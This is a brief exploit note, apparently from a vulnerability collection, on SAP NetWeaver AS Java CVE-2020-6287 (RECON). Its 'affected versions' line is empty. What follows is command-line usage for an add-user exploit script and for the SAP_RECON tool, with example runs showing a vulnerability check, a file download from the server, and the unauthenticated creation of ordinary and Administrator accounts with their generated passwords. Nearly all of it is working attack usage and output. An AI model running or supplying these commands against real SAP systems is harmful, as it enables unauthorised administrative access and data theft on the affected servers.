影响版本:
exp(sap-CVE-2020-6287-add-user.py):
python .\sap-CVE-2020-6287-add-user.py http://vulIP:50000/ test123 test@123123
exp2(RECON.py): chipik/SAP_RECON Just point SAP NW AS Java hostnmae/ip.
There is additional options:
-c
- check if SAP server is vulnerable to RECON-f
- download zip
file from SAP server-u
- create user SAP JAVA user with Authenticated User
role -a
- create user SAP JAVA user with Administrator
roleEx.: Download zip file
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
Ex.: Create SAP JAVA user
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
Ex.: Create SAP JAVA Administrator user
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created